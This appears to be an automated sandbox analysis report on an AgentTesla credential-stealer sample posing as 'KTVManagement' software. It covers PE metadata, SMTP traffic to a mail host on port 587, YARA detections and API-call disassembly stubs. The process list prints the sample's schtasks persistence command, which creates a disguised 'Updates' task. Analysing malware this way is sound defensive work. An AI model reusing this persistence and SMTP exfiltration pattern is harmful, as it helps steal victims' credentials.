                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xec1d00x4b.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x5200.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xea2240xea400False0.631924526414data7.13411382713IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xee0000x52000x5200False0.189738948171data4.23787907322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xf40000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                            RT_ICON0xee1000x4228dBase III DBT, version number 0, next free block index 40
                                                                                                            RT_GROUP_ICON0xf23380x14data
                                                                                                            RT_VERSION0xf235c0x350data
                                                                                                            RT_MANIFEST0xf26bc0xb15XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Version Infos

                                                                                                            DescriptionData
                                                                                                            Translation0x0000 0x04b0
                                                                                                            LegalCopyrightCopyright 2014
                                                                                                            Assembly Version3.0.0.0
                                                                                                            InternalNameObjectIDGenerator.exe
                                                                                                            FileVersion3.0.0.0
                                                                                                            CompanyNameKTV
                                                                                                            LegalTrademarks
                                                                                                            Comments
                                                                                                            ProductNameKTVManagement
                                                                                                            ProductVersion3.0.0.0
                                                                                                            FileDescriptionKTVManagement
                                                                                                            OriginalFilenameObjectIDGenerator.exe

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Feb 25, 2021 12:17:51.331866026 CET49767587192.168.2.4208.91.198.143
                                                                                                            Feb 25, 2021 12:17:51.509077072 CET58749767208.91.198.143192.168.2.4
                                                                                                            Feb 25, 2021 12:17:51.509422064 CET49767587192.168.2.4208.91.198.143
                                                                                                            Feb 25, 2021 12:17:51.700047016 CET49767587192.168.2.4208.91.198.143
                                                                                                            Feb 25, 2021 12:17:51.875421047 CET58749767208.91.198.143192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.132086992 CET58749767208.91.198.143192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.133080959 CET58749767208.91.198.143192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.133245945 CET49767587192.168.2.4208.91.198.143
                                                                                                            Feb 25, 2021 12:17:52.136126041 CET49767587192.168.2.4208.91.198.143
                                                                                                            Feb 25, 2021 12:17:52.172266960 CET49769587192.168.2.4208.91.199.224
                                                                                                            Feb 25, 2021 12:17:52.347788095 CET58749769208.91.199.224192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.347913027 CET49769587192.168.2.4208.91.199.224
                                                                                                            Feb 25, 2021 12:17:52.556086063 CET49769587192.168.2.4208.91.199.224
                                                                                                            Feb 25, 2021 12:17:52.732153893 CET58749769208.91.199.224192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.903023958 CET58749769208.91.199.224192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.903078079 CET58749769208.91.199.224192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.903177977 CET49769587192.168.2.4208.91.199.224
                                                                                                            Feb 25, 2021 12:17:52.903203964 CET49769587192.168.2.4208.91.199.224

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Feb 25, 2021 12:16:08.954318047 CET5453153192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:09.016263008 CET53545318.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:09.560831070 CET4971453192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:09.628031015 CET53497148.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:09.943583012 CET5802853192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:09.992244005 CET53580288.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:10.898617983 CET5309753192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:10.948581934 CET53530978.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:11.871423006 CET4925753192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:11.920135975 CET53492578.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:13.275801897 CET6238953192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:13.327435017 CET53623898.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:14.433896065 CET4991053192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:14.495963097 CET53499108.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:17.263098001 CET5585453192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:17.316633940 CET53558548.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:21.227560043 CET6454953192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:21.276355982 CET53645498.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:22.460968971 CET6315353192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:22.521953106 CET53631538.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:25.565582037 CET5299153192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:25.615742922 CET53529918.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:26.567420006 CET5370053192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:26.619057894 CET53537008.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:27.530153036 CET5172653192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:27.578783035 CET53517268.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:28.491105080 CET5679453192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:28.539812088 CET53567948.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:29.634676933 CET5653453192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:29.683394909 CET53565348.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:30.969171047 CET5662753192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:31.034598112 CET53566278.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:32.470849037 CET5662153192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:32.519582987 CET53566218.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:34.405419111 CET6311653192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:34.457778931 CET53631168.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:35.373509884 CET6407853192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:35.422241926 CET53640788.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:39.010205030 CET6480153192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:39.063091993 CET53648018.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:44.146946907 CET6172153192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:44.210143089 CET53617218.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:16:59.515502930 CET5125553192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:16:59.578229904 CET53512558.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:00.533399105 CET6152253192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:00.591711044 CET53615228.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:01.171139956 CET5233753192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:01.229161024 CET53523378.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:01.658354998 CET5504653192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:01.672601938 CET4961253192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:01.715528011 CET53550468.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:01.743844986 CET53496128.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:02.226500988 CET4928553192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:02.275459051 CET53492858.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:02.812575102 CET5060153192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:02.874855042 CET53506018.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:03.473861933 CET6087553192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:03.531816006 CET53608758.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:03.868362904 CET5644853192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:03.917093992 CET53564488.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:04.346051931 CET5917253192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:04.395165920 CET53591728.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:05.323928118 CET6242053192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:05.385248899 CET53624208.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:06.007525921 CET6057953192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:06.066492081 CET53605798.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:14.653417110 CET5018353192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:14.704200983 CET53501838.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:14.856503963 CET6153153192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:14.932482958 CET53615318.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:17.254736900 CET4922853192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:17.315517902 CET53492288.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:51.249157906 CET5979453192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:51.313503027 CET53597948.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:51.505810976 CET5591653192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:51.555139065 CET53559168.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:52.108124971 CET5275253192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:52.169742107 CET53527528.8.8.8192.168.2.4
                                                                                                            Feb 25, 2021 12:17:53.187391996 CET6054253192.168.2.48.8.8.8
                                                                                                            Feb 25, 2021 12:17:53.247427940 CET53605428.8.8.8192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                            Feb 25, 2021 12:17:51.249157906 CET192.168.2.48.8.8.80x224bStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:52.108124971 CET192.168.2.48.8.8.80x286dStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                            Feb 25, 2021 12:17:51.313503027 CET8.8.8.8192.168.2.40x224bNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:51.313503027 CET8.8.8.8192.168.2.40x224bNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:51.313503027 CET8.8.8.8192.168.2.40x224bNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:51.313503027 CET8.8.8.8192.168.2.40x224bNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:52.169742107 CET8.8.8.8192.168.2.40x286dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:52.169742107 CET8.8.8.8192.168.2.40x286dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:52.169742107 CET8.8.8.8192.168.2.40x286dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                                                            Feb 25, 2021 12:17:52.169742107 CET8.8.8.8192.168.2.40x286dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)

                                                                                                            SMTP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                            Feb 25, 2021 12:17:52.132086992 CET58749767208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                            Feb 25, 2021 12:17:52.903023958 CET58749769208.91.199.224192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix

                                                                                                            Code Manipulations

                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Start time:12:16:15
                                                                                                            Start date:25/02/2021
                                                                                                            Path:C:\Users\user\Desktop\4019223246.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Users\user\Desktop\4019223246.exe'
                                                                                                            Imagebase:0x850000
                                                                                                            File size:981504 bytes
                                                                                                            MD5 hash:87E6882BCEBF4823AFB4303AAC3628B1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.658750521.0000000002C95000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.658704693.0000000002C41000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            General

                                                                                                            Start time:12:16:19
                                                                                                            Start date:25/02/2021
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WZXjvtGBEKK' /XML 'C:\Users\user\AppData\Local\Temp\tmp35E.tmp'
                                                                                                            Imagebase:0x970000
                                                                                                            File size:185856 bytes
                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:12:16:19
                                                                                                            Start date:25/02/2021
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff724c50000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            General

                                                                                                            Start time:12:16:20
                                                                                                            Start date:25/02/2021
                                                                                                            Path:C:\Users\user\Desktop\4019223246.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\Desktop\4019223246.exe
                                                                                                            Imagebase:0x460000
                                                                                                            File size:981504 bytes
                                                                                                            MD5 hash:87E6882BCEBF4823AFB4303AAC3628B1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.913312856.0000000002ED4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.914172803.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.914560852.0000000004FE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.913196902.0000000002E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.657508762.0000000000BE4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.912388878.00000000025A2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.912715120.00000000029F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            Disassembly

                                                                                                            Code Analysis

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012FC87E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 26479c7d88aaabd8b22e93889ef6d147437286efb4373e8f871faa5043ac6c23
                                                                                                              • Instruction ID: a69e3ea8cdc63305c31d6e738707aca94012ebf98f290e50ef38c24c58317841
                                                                                                              • Opcode Fuzzy Hash: 26479c7d88aaabd8b22e93889ef6d147437286efb4373e8f871faa5043ac6c23
                                                                                                              • Instruction Fuzzy Hash: D8715670A10B098FDB24DF29C455B6ABBF1BF88214F00892EE286D7A50DB35E915CF90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012FE80A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 4b65905da36d00f26b77ad34a23502c6d7f6c0bcce77ca5e6733d363a31c3b9d
                                                                                                              • Instruction ID: 19d3d8f105f3bfe9a72f7c62058d5d5d49389506665248bab151cd623cdfbad1
                                                                                                              • Opcode Fuzzy Hash: 4b65905da36d00f26b77ad34a23502c6d7f6c0bcce77ca5e6733d363a31c3b9d
                                                                                                              • Instruction Fuzzy Hash: A151CEB1D103099FDB15CF99C884ADEFBB5FF48314F25812AE919AB220D774A845CF90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 012FE80A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 37d9e3e62d11415d50c8d046466a57e6949a21ab4b9d3d4d4c02f21e500ffa47
                                                                                                              • Instruction ID: e7220bc347d56f8c973861749f8092eb48f28dac51abdf43681e339ff61e1185
                                                                                                              • Opcode Fuzzy Hash: 37d9e3e62d11415d50c8d046466a57e6949a21ab4b9d3d4d4c02f21e500ffa47
                                                                                                              • Instruction Fuzzy Hash: 7151BDB1D103099FDB15CFA9C984ADDFBB1BF48314F25822AE919AB220D774A945CF90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012F7A4F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 7a5822e65033c29ee621cb3342a38fd0ea6b5bbb5c8d7ae6cf269182d11433bd
                                                                                                              • Instruction ID: f07c288e958f73e19c6c92196bc9133be81f3ec20abcd8d39d418a0288d1ee32
                                                                                                              • Opcode Fuzzy Hash: 7a5822e65033c29ee621cb3342a38fd0ea6b5bbb5c8d7ae6cf269182d11433bd
                                                                                                              • Instruction Fuzzy Hash: 4E21C4B5900219AFDB10CFA9D888ADEFBF4FB48324F14842AE954A3350D374A954CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012F7A4F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: a1b366010d36ed14a3758c2aeb2668da7bc0102df7ae5579d6025ace85a31732
                                                                                                              • Instruction ID: 0de027c41b6e9a7bafa7fe152642c6b52c0fc6aa0eccba6d63e40d0f0713a69f
                                                                                                              • Opcode Fuzzy Hash: a1b366010d36ed14a3758c2aeb2668da7bc0102df7ae5579d6025ace85a31732
                                                                                                              • Instruction Fuzzy Hash: F521D5B59002199FDB10CFA9D888ADEFBF4FB48324F14842AE954A3310D374A954CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FC8F9,00000800,00000000,00000000), ref: 012FCB0A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: fe70d896e9ab3ab938478ca96952e70ee1a3162b7768902ce262b28fea71b5ba
                                                                                                              • Instruction ID: 743f6f8b29c94a5cff20f4502d15f249880821fd59f750dd372c734c4f9a5b18
                                                                                                              • Opcode Fuzzy Hash: fe70d896e9ab3ab938478ca96952e70ee1a3162b7768902ce262b28fea71b5ba
                                                                                                              • Instruction Fuzzy Hash: 4B1117B69002098FDB10CF9AD448BDEFBF4FB48324F04842EE555A7200C375A555CFA5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FC8F9,00000800,00000000,00000000), ref: 012FCB0A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: e1aecb0191dde81728ecf0f17ee5de07daa17398287d63ce8e6cd9629e3f2a4c
                                                                                                              • Instruction ID: 46ea63d65a0cc5093e2526a76da73f73bb62d6442089f9075c834be53f1e7e27
                                                                                                              • Opcode Fuzzy Hash: e1aecb0191dde81728ecf0f17ee5de07daa17398287d63ce8e6cd9629e3f2a4c
                                                                                                              • Instruction Fuzzy Hash: B811D0B69002098FDB14CF9AD588BDEFBF4AB48324F14842EE659B7600C375A655CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012FC87E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 18ef54a0c076dcdb5201e5fd5d9cb53a3452c8f670868b100b75e25009d62986
                                                                                                              • Instruction ID: b979d4844d9c2dd21c313237e850fe582aea2d843dc022e0e6d76de613ce37de
                                                                                                              • Opcode Fuzzy Hash: 18ef54a0c076dcdb5201e5fd5d9cb53a3452c8f670868b100b75e25009d62986
                                                                                                              • Instruction Fuzzy Hash: E01113B5C003098FDB14CF9AC448BDEFBF4EB88324F14842AD969A7600C374A545CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 012FE99D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1378638983-0
                                                                                                              • Opcode ID: 09995946ae162e5302370cac2b8edf0323740b82e2b1e764b2259b9f58ea4bd6
                                                                                                              • Instruction ID: 8cc97f113357fafd40e7e4300891350150730c70acfc581f0e89ce053e0609c4
                                                                                                              • Opcode Fuzzy Hash: 09995946ae162e5302370cac2b8edf0323740b82e2b1e764b2259b9f58ea4bd6
                                                                                                              • Instruction Fuzzy Hash: 131103B58002099FDB10CF99D488BDEFBF8FB48324F14841AE958A3340C3B4A944CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 012FE99D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1378638983-0
                                                                                                              • Opcode ID: 2d0ee88d853c65d9c28d02a72546300cbd74912d495b7f820d258820c5f7019f
                                                                                                              • Instruction ID: 6c870c238698fd8d10f626b10051d6b48e4dd477dc44ab8b3c515ec6c20580a2
                                                                                                              • Opcode Fuzzy Hash: 2d0ee88d853c65d9c28d02a72546300cbd74912d495b7f820d258820c5f7019f
                                                                                                              • Instruction Fuzzy Hash: 8F11E2B59002099FDB20CF99D588BDEFBF8FB49324F15841AE959A7740C3B4A944CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658173634.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 19a3eaaa90cb2438249f73136de8e01412a08789f6b68c4eb73a884c9c900c39
                                                                                                              • Instruction ID: 9425b999dffda1301a61f60dc240e141a2081e354b7de0e4d68ef1fc0ac58e9a
                                                                                                              • Opcode Fuzzy Hash: 19a3eaaa90cb2438249f73136de8e01412a08789f6b68c4eb73a884c9c900c39
